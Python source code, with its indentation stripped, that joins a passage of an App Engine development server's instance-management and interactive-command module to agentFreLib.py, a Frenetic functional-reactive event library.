while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. 8080.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raised is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed out while waiting for another one to complete']
def restart(self):
"""Restarts the the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ' + str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
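# Illustrative usage sketch (not part of the original module): given a fully
# constructed InteractiveCommandModule, a caller such as the Dispatcher can
# evaluate a snippet inside the running application. The variable name
# `interactive_module` is hypothetical.
#
#   try:
#     output = interactive_module.send_interactive_command('print 5+5')
#   except InteractiveCommandError as e:
#     output = str(e)
#   # `output` holds the command's captured response body, e.g. "10\n".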
|
agentFreLib.py
|
################################################################################
# The Frenetic Project #
# frenetic@frenetic-lang.org #
################################################################################
# Licensed to the Frenetic Project by one or more contributors. See the #
# NOTICE file distributed with this work for additional information #
# regarding copyright and ownership. The Frenetic Project licenses this #
# file to you under the following license. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided the following conditions are met: #
# - Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation or other materials provided with the distribution. #
# - The names of the copyright holds and contributors may not be used to #
# endorse or promote products derived from this work without specific #
# prior written permission. #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# LICENSE file distributed with this work for specific language governing #
# permissions and limitations under the License. #
################################################################################
# /src/frenetic_lib.py #
# Frenetic standard library #
# $Id$ #
################################################################################
import inspect
import sys
import threading
import agentFreUtil as util
import agentFreTypes as types
from agentFreFrp import FEvent, FEventFun, FListener, FBehavior, RawEvent
# JNF: these flags should really be set from the command line
# turning them on for now
RUN_TESTS = False
DEBUG = True
##########
# EVENTS #
##########
# switchJoin : E switch
(switchJoin_E,switchJoin_go) = RawEvent()
def SwitchJoin():
return switchJoin_E
# switchLeave : E switch
(switchLeave_E,switchLeave_go) = RawEvent()
def SwitchLeave():
return switchLeave_E
# seconds : E int
#(seconds_E,seconds_go) = RawEvent()
#seconds_going = False
#def seconds_callback():
# seconds_go(util.current_time())
# net.inst.post_callback(1, seconds_callback)
# return True
#def Seconds():
# global seconds_going
# if not seconds_going:
# seconds_going = True
# seconds_callback()
# return seconds_E
# PortEvents() : E (PortEvent)
#(portEvent_E, portEvent_go) = RawEvent()
#def PortEvents():
# return portEvent_E
# Input : string -> E string
def Input(prompt):
(e,go) = RawEvent()
def run():
try:
while True:
x = raw_input(prompt)
go(x)
except EOFError:
for l in e.listeners.itervalues():
l.terminate()
exit(0)
t = threading.Thread(target=run)
t.start()
return e
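# Illustrative sketch (not part of the original library): echo every line
# typed at the prompt by attaching a listener to the Input event. FListener's
# push callback runs once per value pushed on the event.
#
#   echo = Input("> ")
#   echo.add_listener(FListener(push=lambda x: sys.stdout.write(x + "\n")))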
# Merge : E a * E b -> E (a option * b option)
def Merge(e1,e2):
e = None
def prepare():
e.fresh = False
for l in e.listeners.itervalues():
l.prepare()
def push1(x1):
if e2.fresh or e2.cell.get() != None:
x2 = e2.cell.get()
for l in e.listeners.itervalues():
l.push((x1,x2))
e2.cell.set(None)
else:
e1.cell.set(x1)
def push2(x2):
if e1.fresh or e1.cell.get() != None:
x1 = e1.cell.get()
for l in e.listeners.itervalues():
l.push((x1,x2))
e1.cell.set(None)
else:
e2.cell.set(x2)
def finish():
x1 = e1.cell.get()
x2 = e2.cell.get()
e1.cell.set(None)
e2.cell.set(None)
if x2 != None:
for l in e.listeners.itervalues():
l.push((None,x2))
if x1 != None:
for l in e.listeners.itervalues():
l.push((x1,None))
for l in e.listeners.itervalues():
l.finish()
e.fresh = True
def terminate1():
e.term1 = True
if e.term2:
for l in e.listeners.itervalues():
l.terminate()
def terminate2():
e.term2 = True
if e.term1:
for l in e.listeners.itervalues():
l.terminate()
e1.add_listener(FListener(prepare,push1,finish,terminate1))
e2.add_listener(FListener(prepare,push2,finish,terminate2))
if e1.type is None or e2.type is None:
out_type = None
else:
# TODO(astory): option
out_type = types.FType((e1.type.type, e2.type.type))
e = FEvent(type=out_type)
e.term1 = False
e.term2 = False
e1.cell = util.FRef()
e2.cell = util.FRef()
return e
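# Illustrative sketch (not part of the original library): Merge pairs values
# arriving on either input, leaving the side that did not fire as None.
#
#   (ea, goa) = RawEvent()
#   (eb, gob) = RawEvent()
#   merged = Merge(ea, eb)
#   merged.add_listener(FListener(push=lambda p: sys.stdout.write(str(p) + "\n")))
#   goa("left")   # emits ("left", None) unless eb fires in the same round
#   gob(42)       # emits (None, 42) in its own round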
# Split E (a * b) -> E a * E b
def Split(e):
e1 = None
e2 = None
def prepare():
e1.fresh = False
e2.fresh = False
for l in e1.listeners.itervalues():
l.prepare()
for l in e2.listeners.itervalues():
l.prepare()
def push((x1,x2)):
for l in e1.listeners.itervalues():
l.push(x1)
for l in e2.listeners.itervalues():
l.push(x2)
def finish():
for l in e1.listeners.itervalues():
l.finish()
for l in e2.listeners.itervalues():
l.finish()
e1.fresh = True
e2.fresh = True
def terminate():
for l in e1.listeners.itervalues():
l.terminate()
for l in e2.listeners.itervalues():
l.terminate()
t1 = t2 = None
if e.type is not None:
try:
(r1, r2) = e.type.type
(t1, t2) = (types.FType(r1), types.FType(r2))
except (TypeError, ValueError):
raise types.FTypeException("%s not of type %s" % (e.type, "a * b"))
e1 = FEvent(type=t1)
e2 = FEvent(type=t2)
e.add_listener(FListener(prepare,push,finish,terminate))
return (e1,e2)
# Apply : E a * EF a b -> E b
def Apply(e1,ef2):
e = None
def prepare():
e.fresh = False
ef2.prepare()
def push(x):
ef2.push(x)
def finish():
ef2.finish()
e.fresh = True
e1.add_listener(FListener(prepare,push,finish,ef2.terminate))
t = None
if ef2.type_fun is not None:
t = ef2.type_fun(e1.type)
e = FEvent(ef2.add_listener, type=t)
return e
############################
# UNIT TESTS AND DEBUGGING #
############################
def unit_test(i, ef, o):
if RUN_TESTS:
def location():
(filename,lineno) = inspect.stack()[2][1:3]
return "File \"" + filename + "\", line " + str(lineno)
(ei,go) = RawEvent()
e = Apply(ei,ef)
def f(x):
y = o.pop(0)
if x != y:
print "%s: Unit test error\nexpected %s\nbut found %s" % (location(),str(y),str(x))
e.add_listener(FListener(push=f))
for x in i:
go(x)
for l in ei.listeners.itervalues():
l.terminate()
if len(o) != 0:
print "%s: Unit test error\nextra outputs %s" % (location(),str(o))
return
def unit_test_merge(i,ef,o):
if RUN_TESTS:
def location():
(filename,lineno) = inspect.stack()[2][1:3]
return "File \"" + filename + "\", line " + str(lineno)
(eia,goa) = RawEvent()
(eib,gob) = RawEvent()
e = ef(eia,eib)
def f((p,q)):
(x,y) = (None,None)
if len(o) > 0:
(x,y) = o.pop(0)
if (x,y) != (p,q):
print >> sys.stderr, "%s: Unit test error\nexpected %s\nbut found %s" % (location(),str((x,y)), str((p,q)))
e.add_listener(FListener(push=f))
for (a,b) in i:
if not(a is None) and not(b is None):
# This isn't truly a parallel call
(goa(a),gob(b))
elif not(a is None):
goa(a)
elif not(b is None):
gob(b)
for l in eia.listeners.itervalues():
l.terminate()
for l in eib.listeners.itervalues():
l.terminate()
if len(o) != 0:
print >> sys.stderr, "%s: Unit test error\nextra outputs %s" % (location(),str(o))
return
def debug_test(i,ef):
if DEBUG:
def location():
(filename,lineno) = inspect.stack()[2][1:3]
return "File \"" + filename + "\", line " + str(lineno)
(ei,go) = RawEvent()
e = Apply(ei,ef)
o = []
def f(x):
o.append(x)
e.add_listener(FListener(push=f))
for x in i:
go(x)
for l in ei.listeners.itervalues():
l.terminate()
print "%s: Test result:\n%s" % (location(),str(o))
return
###################
# EVENT FUNCTIONS #
###################
# Lift: (a -> b) -> EF a b
def Lift(g, in_type=None, out_type=None, type_fun=None):
"""Lift function g into an EF. Optional type annotations {in,out}_type, or
you can give a type conversion function, which overrides static types.
Note that in_type and out_type MUST be wrapped in types.FType,or something
with its interface, and type_fun should expect its input and output wrapped
in the same class.
A None type object acts as a signal to ignore type checking this
type. It should not throw type exceptions."""
ef = None
def push(x):
y = g(x)
for l in ef.listeners.itervalues():
l.push(y)
if type_fun is None:
def type_fun(test_in_type):
if in_type is None or types.is_of_type(test_in_type, in_type):
return out_type
else:
raise types.FTypeException(
"%s not of type %s" % (test_in_type, in_type))
ef = FEventFun(push=push, type_fun=type_fun)
return ef
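# Illustrative sketch (not part of the original library): lift an ordinary
# function into an event function and check it with the unit_test helper
# above (active only when RUN_TESTS is True). FType annotations such as
# in_type=types.FType("integer") can be added as described in the docstring.
#
#   double = Lift(lambda x: 2 * x)
#   unit_test([1, 2, 3], double, [2, 4, 6])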
# Compose: EF a b * EF b c -> EF a c
def Compose(ef1,ef2):
ef1.add_listener(ef2)
def type_fun(t):
if t is None:
return None
out1 = ef1.type_fun(t)
if out1 is None:
return None
out2 = ef2.type_fun(out1)
return out2
ef = FEventFun(
ef2.add_listener,
ef1.prepare,
ef1.push,
ef1.finish,
ef1.terminate,
type_fun)
return ef
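# Illustrative sketch (not part of the original library): Compose pipes the
# output of one event function into another, as in the commented-out
# Compose(Tally(), Sum()) unit test near the end of this file.
#
#   inc = Lift(lambda x: x + 1)
#   dbl = Lift(lambda x: 2 * x)
#   unit_test([1, 2, 3], Compose(inc, dbl), [4, 6, 8])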
# First : EF a b -> EF (a * c) (b * c)
def First(ef1):
ef = None
def prepare():
ef1.prepare()
for l in ef.listeners.itervalues():
l.prepare()
def push((x1,x2)):
ef.cell.set(x2)
ef1.push(x1)
def push2(y1):
y2 = ef.cell.get()
for l in ef.listeners.itervalues():
l.push((y1,y2))
def finish():
ef1.finish()
for l in ef.listeners.itervalues():
l.finish()
def terminate():
ef1.terminate()
for l in ef.listeners.itervalues():
l.terminate()
def type_fun(in_type):
if in_type is None:
return None
try:
(a, c) = in_type.type
except ValueError:
raise types.FTypeException("%s not of type (a * c)" % in_type)
return types.FType((ef1.type_fun(types.FType(a)).type, c))
ef = FEventFun(
prepare=prepare,
push=push,
finish=finish,
terminate=terminate,
type_fun=type_fun)
ef.cell = util.FRef()
ef1.add_listener(FListener(push=push2))
return ef
# LoopPre : c -> EF (a,c) (b,c) -> EF a b
def LoopPre(c, ef1, c_type=None):
ef = None
def prepare():
ef1.prepare()
for l in ef.listeners.itervalues():
l.prepare()
def push(x):
ef1.push((x,ef.cell.get()))
def push2((y1,y2)):
ef.cell.set(y2)
for l in ef.listeners.itervalues():
l.push(y1)
def finish():
ef1.finish()
for l in ef.listeners.itervalues():
l.finish()
def terminate():
ef1.terminate()
for l in ef.listeners.itervalues():
l.terminate()
def type_fun(a):
if a is None or c_type is None:
return None
eftype = ef1.type_fun(types.FType((a.type, c_type.type)))
if eftype is None:
return None
(b, c) = eftype.type
if not types.is_of_type(c_type, types.FType(c)):
raise types.FTypeException("%s is not of type %s" % (c, c_type))
return types.FType(b)
ef = FEventFun(
prepare=prepare,
push=push,
finish=finish,
terminate=terminate,
type_fun = type_fun)
ef.cell = util.FRef()
ef.cell.set(c)
ef1.add_listener(FListener(push=push2))
return ef
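# Illustrative sketch (not part of the original library): LoopPre feeds part
# of the output back in as state on the next push, so a running sum is just
# a lifted step function with an initial accumulator of 0 (this is how the
# commented-out Accum/Sum combinators below are built).
#
#   def running_sum_step((x, acc)):
#       total = x + acc
#       return (total, total)
#   unit_test([1, 2, 3, 4], LoopPre(0, Lift(running_sum_step)), [1, 3, 6, 10])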
# bind: (a -> E b) -> EF a b
# Filter : (a -> bool) -> EF a a
def Filter(g):
ef = None
def push(x):
if g(x):
for l in ef.listeners.itervalues():
l.push(x)
ef = FEventFun(push=push, type_fun = lambda a : a)
return ef
# Group : (a -> b) -> EF a (b * E a)
def Group(g, b_type=None):
ef = None
def prepare():
for l in ef.listeners.itervalues():
l.prepare()
for e in ef.table.values():
e.fresh = False
for l in e.listeners.itervalues():
l.prepare()
def push(x):
y = g(x)
e = None
if y not in ef.table:
e = FEvent()
ef.table[y] = e
for l in ef.listeners.itervalues():
l.push((y,e))
else:
e = ef.table[y]
for l in e.listeners.itervalues():
l.push(x)
def finish():
for e in ef.table.values():
for l in e.listeners.itervalues():
l.finish()
e.fresh = True
for l in ef.listeners.itervalues():
l.finish()
def terminate():
for e in ef.table.values():
for l in e.listeners.itervalues():
l.terminate()
for l in ef.listeners.itervalues():
l.terminate()
def type_fun(a):
if a is not None and b_type is not None:
return types.FType((b_type.type, types.FEventType(a.type)))
else:
return None
ef = FEventFun(prepare=prepare,
push=push,
finish=finish,
terminate=terminate,
type_fun=type_fun)
ef.table = {}
return ef
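# Illustrative sketch (not part of the original library): Group fans a stream
# out into one sub-event per key. The first time g(x) produces a new key, the
# pair (key, sub-event) is pushed downstream; every x is then pushed on the
# sub-event for its key.
#
#   parity = Group(lambda x: x % 2)
#   # Applied to an integer event, `parity` emits (1, E-of-odds) and
#   # (0, E-of-evens), with each integer routed to its own sub-event.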
# Regroup : ((a * a) -> Bool) -> EF (b * E a) (b * E a)
def Regroup(feq):
# helper function to split a nested subevent
def mk_subevent(e,outer_prepare,outer_push):
sube_cell = util.FRef()
def mk():
sube = FEvent()
sube.last_cell = util.FRef()
return sube
def subprepare():
sube = sube_cell.get()
sube.fresh = False
for l in sube.listeners.itervalues():
l.prepare()
def subpush(x):
sube = sube_cell.get()
last = sube.last_cell.get()
if not (last is None) and not (feq(last,x)):
# terminate / create new subevent
sube_old = sube
sube = mk()
subterminate()
sube_cell.set(sube)
subprepare()
outer_prepare()
outer_push(sube)
for l in sube.listeners.itervalues():
l.push(x)
sube.last_cell.set(x)
def subfinish():
sube = sube_cell.get()
for l in sube.listeners.itervalues():
l.finish()
sube.fresh = True
def subterminate():
sube = sube_cell.get()
for l in sube.listeners.itervalues():
l.terminate()
sube = mk()
sube_cell.set(sube)
e.add_listener(FListener(subprepare,subpush,subfinish,subterminate))
return sube
ef = None
def prepare():
for l in ef.listeners.itervalues():
l.prepare()
def push((x,e)):
outer_push = lambda e: push((x,e))
sube = mk_subevent(e,prepare,outer_push)
for l in ef.listeners.itervalues():
l.push((x,sube))
# TODO(astory): consider checking for correctness
ef = FEventFun(push=push, type_fun = lambda a : a)
return ef
# Ungroup : int option * (b * a -> b) -> b -> EF (c * E a) (c * b)
def Ungroup(n,f,init, init_type=None):
ef = None
def go(x,y):
for l in ef.listeners.itervalues():
l.push((x,y))
def mk_lpush(e):
def g(z):
(x,i,b,y) = ef.table[e]
if not b:
y = f(y,z)
if not (n is None) and i == n - 1:
b = True
go(x,y)
ef.table[e] = (x,i+1,b,y)
return g
def mk_lterm(e):
def g():
(x,i,b,y) = ef.table[e]
if not b:
go(x,y)
return g
def push((x,e)):
ef.table[e] = (x,0,False,init)
e.add_listener(FListener(push=mk_lpush(e),terminate=mk_lterm(e)))
def type_fun(t):
if t is None or init_type is None:
return None
try:
(c, a) = t.type
except (TypeError, ValueError):
raise types.FTypeException("%s not an instance of (c * E a)" % a)
f_out_type = f.type_fun(types.FType((init_type.type, a.type)))
if not types.is_of_type(f_out_type, init_type):
raise types.FTypeException(
"%s not of expected type: f generates %s instead of %s"
% (t, f_out_type, init_type))
return types.FType((c, init_type.type))
ef = FEventFun(push=push,type_fun=type_fun)
ef.table = {}
return ef
#############
# BEHAVIORS #
#############
# Hold : a -> E a -> B a
def Hold(a,e1):
b = None
def pull():
return b.cell.get()
def push(a):
b.cell.set(a)
b = FBehavior(pull, types.FBehaviorType(e1.type))
b.cell = util.FRef()
b.cell.set(a)
e1.add_listener(FListener(push=push))
return b
# Snapshot : B a -> E b -> E (a,b)
def Snapshot(b1,e2):
e = None
def prepare():
e.fresh = False
for l in e.listeners.itervalues():
l.prepare()
def push(b):
a = b1.pull()
for l in e.listeners.itervalues():
l.push((a,b))
def finish():
for l in e.listeners.itervalues():
l.finish()
e.fresh = True
def terminate():
for l in e.listeners.itervalues():
l.terminate()
e2.add_listener(FListener(prepare,push,finish,terminate))
e = FEvent(type=types.FEventType((b1.type, e2.type)))
return e
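# Illustrative sketch (not part of the original library): Hold remembers the
# most recent value of an event as a behavior, and Snapshot samples that
# behavior whenever a second event fires.
#
#   (clicks, go_click) = RawEvent()
#   (ticks, go_tick) = RawEvent()
#   last_click = Hold(None, clicks)
#   samples = Snapshot(last_click, ticks)   # E (latest click, tick value)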
############################
# LISTENERS and REGISTRARS #
############################
#def Attach(e,l):
# e.add_listener(l)
#
## Print_listener : string -> output channel -> L string
#def Print(g=None,s=sys.stdout):
# def push(x):
# if g is None:
# print >> s, str(x)
# else:
# g(x)
# return FListener(push=push)
#
## Install_listener : Policy
#def Control():
# def push(rs):
# #exeModule something for policies
# print 'control policies'
# return FListener(push=push)
# register_static : (rule set) -> unit
#def register_static_rules(rs):
# rts.set_rules(rs)
# Nox_packet_listener L (switch * nox_packet * port)
#def NOXSend():
# def push((dpid,packet,port)):
# a = [[openflow.OFPAT_OUTPUT,[0,port]]]
# net.inst.send_openflow_packet(dpid, packet.tostring(), a)
# return FListener(push=push)
#def NOXSendPkt():
# def push(pkt):
# a = [[openflow.OFPAT_OUTPUT,[0,net.inport(net.header(pkt))]]]
# net.inst.send_openflow_packet(net.switch(net.header(pkt)), pkt.payload.tostring(), a)
# return FListener(push=push)
############
## LIBRARY #
############
## TODO(astory): type variables
#
## Identity : EF a a
#def Identity():
# return Lift(lambda x: x, type_fun=lambda x: x)
#
## Probe : string -> EF a a
#def Probe(y, s=sys.stdout):
# def f(x):
# print >> s, (str(y) + str(x))
# return x
# return Lift(f, type_fun=lambda x:x)
#
## Dup : EF a (a * a)
#def Dup():
# def type_fun(t):
# if t is None:
# return None
# return types.FType((t.type, t.type))
# return Lift(lambda x: (x,x), type_fun=type_fun)
#
## Smash : a * b * E a * E b -> E (a * b)
#def Smash(a,b,e1,e2):
# def m((a2,b2),(a1,b1)):
# if a2 is None:
# return (a1,b2)
# elif b2 is None:
# return (a2,b1)
# else:
# return (a2,b2)
# t = None
# t1 = e1.type
# t2 = e2.type
# if t1 is not None and t2 is not None:
# t = FType((t1,t2))
# e = Merge(e1,e2) >> \
# Accum((a,b), m, init_type=t)
# return e
#
## Fst : EF (a * b) a
#def Fst():
# def typef(t):
# if t is None:
# return None
# try:
# (x,y) = t.type
# return types.FType(x)
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * b" % t)
# return Lift(lambda (x,y): x, type_fun=typef)
#
## Snd : Ef (a * b) b
#def Snd():
# def typef(t):
# if t is None:
# return None
# try:
# (x,y) = t.type
# return types.FType(y)
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * b" % t)
# return Lift(lambda (x,y): y, type_fun=typef)
#
## Swap : EF (a * b) (a * b)
#def Swap():
# # TODO(astory): I think this is supposed to be a,b -> b,a
# def typef(t):
# if t is None:
# return None
# try:
# (x,y) = t.type
# return types.FType((y,x))
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * b" % t)
# return Lift(lambda (x,y): (y,x), type_fun=typef)
#
## Second : EF c d -> EF (a * c) (a * d)
#def Second(ef2):
# return Compose(Swap(),Compose(First(ef2),Swap()))
#
## Pair : EF a b * EF c d -> EF (a * c) -> EF (b * d)
#def Pair(ef1,ef2):
# return Compose(First(ef1),Second(ef2))
#
## Ticks : EF a int
#def Ticks():
# def type_fun(t):
# try:
# (a, i) = t.type
# except (TypeError, ValueError):
# raise types.FTypeException("%s not of type a * integer" % t)
# if i != "integer":
# raise FTypeException("%s not of type %s" % (t, "a * integer"))
# return types.FType(("integer", "integer"))
# return LoopPre(0, Lift(
# lambda (x,y): (y,y+1),
# type_fun=type_fun), c_type=types.FType("integer"))
#
## Reverse : EF string string
#def Reverse():
# return Lift(lambda x: ''.join([y for y in reversed(x)]),
# in_type=types.FType("string"),
# out_type=types.FType("string"))
#
## Split2 : EF string (string * string)
#def Split2(s):
# def f(x):
# try:
# i = x.index(s)
# x1 = x[:i]
# x2 = x[i+1:len(x)]
# return (x1,x2)
# except ValueError:
# return (x,"")
# return Lift(f, types.FType("string"), types.FType(("string", "string")))
#
## Tabulate : EF string ((string, string list) dictionary)
#def Tabulate():
# def f(((k,v),d)):
# if not d.has_key(k):
# d[k] = []
# d[k].append(v)
# return (d,d)
# # TODO(astory): list, dictionary types
# return LoopPre({},Lift(f,
# in_type=types.FType("string"),
# out_type=types.FType((("string", "string list"), "dictionary"))),
# c_type="dictionary")
#
## TopK : int -> EF ((string,string list) dictionary) (string list)
#def TopK(n):
# def f(d):
# l = []
# for (k,v) in d.items():
# i = reduce(lambda x,w: x + len(w),v,0)
# l.append((k,i))
# l.sort(cmp=lambda (k1,i1),(k2,i2): cmp(i1,i2))
# return map(lambda (k,i):k, l[-n:])
# return Lift(f,
# in_type=types.FType((("string", "string list"), "dictionary")),
# out_type=types.FType("string list"))
#
## Calm : EF a a
#def Calm():
# def calmfilter((x,(isMatched,y))):
# return isMatched
# def calmupdate((x,(isLastMatched,y))):
# if isLastMatched:
# return (x, (x != y, x))
# else:
# return (x, (True, x))
# def type_fun(tup):
